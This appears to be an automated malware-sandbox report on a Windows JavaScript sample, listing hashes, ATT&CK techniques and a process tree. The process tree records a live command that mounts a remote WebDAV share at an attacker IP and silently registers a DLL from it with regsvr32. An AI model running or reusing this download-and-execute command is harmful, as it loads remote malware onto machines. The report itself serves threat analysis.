a93f69950a022f1647cc9c384986a896a1a1eed4198f7f5279dc84ce0f82f75f

Analysis

max time kernel
135s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
24/07/2024, 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a93f69950a022f1647cc9c384986a896a1a1eed4198f7f5279dc84ce0f82f75f.js
Size

5KB
MD5

be064c1a132194e89ccef2c3314b3c2f
SHA1

1732b8451b7ccc72bf00ed9f8965d49b45af96e5
SHA256

a93f69950a022f1647cc9c384986a896a1a1eed4198f7f5279dc84ce0f82f75f
SHA512

c92f20728ea6dd640c7610ea3d1663d4ec211a886d3d80d27c713410a91043606db8b9b92b9b7db76396fdd65de9e9946774015d84a618c383d504a82592324b
SSDEEP

96:QXojTAYEKO4457tdmGPoxeyYv6Z8zg7g7g7gI2YcT9NAkGf8zg7g7g7gI2YcT9Na:QCAYEKO44/ddseyYvKF2YsAkGfF2YsAl

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4488 wrote to memory of 1012	4488	wscript.exe	86
PID 4488 wrote to memory of 1012	4488	wscript.exe	86
PID 1012 wrote to memory of 1088	1012	cmd.exe	88
PID 1012 wrote to memory of 1088	1012	cmd.exe	88

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\a93f69950a022f1647cc9c384986a896a1a1eed4198f7f5279dc84ce0f82f75f.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\24181568218203.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1012
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:1088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads